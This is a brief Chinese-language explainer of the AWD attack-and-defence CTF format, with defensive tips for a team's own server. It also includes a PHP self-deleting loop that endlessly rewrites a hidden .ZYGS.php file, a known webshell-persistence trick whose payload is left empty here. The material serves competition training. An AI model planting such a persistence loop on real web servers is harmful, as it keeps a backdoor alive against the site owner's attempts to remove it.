AWD(Attack With Defense,攻防兼备)模式是一个非常有意思的模式,你需要在一场比赛里要扮演攻击方和防守方,攻者得分,失守者会被扣分。也就是说,攻击别人的靶机可以获取 Flag 分数时,别人会被扣分,同时你也要保护自己的主机不被别人得分,以防扣分。
在攻防模式中,参赛队伍分别防守同样配置的虚拟靶机,并在有限的博弈时间内,找到其他战队的薄弱环节进行攻击,同时要对自己的靶机环境进行加固防守。比赛采用零和积分方式,即每个战队都拥有相同的起始分数,挖掘网络服务漏洞并攻击对手服务取得flag获得积分,被攻击方扣减相应分数;修补自身服务漏洞进行防御来避免丢分,最终以得分高低直接分出胜负。

一些waf软件部署,不过要看清要求,可能比赛并不允许一些waf
备份网站文件,方便之后的恢复
扫扫看,看看有没有后门
监控网站文件,防止被篡改和添加
- ignore_user_abort(true);
- set_time_limit(0);
- @unlink(__FILE__);
- $file = '.ZYGS.php';
- $code = '';
- while (1){
- file_put_contents($file,$code);
- usleep(5000);
- }
- ?>
这个就靠平时的积累了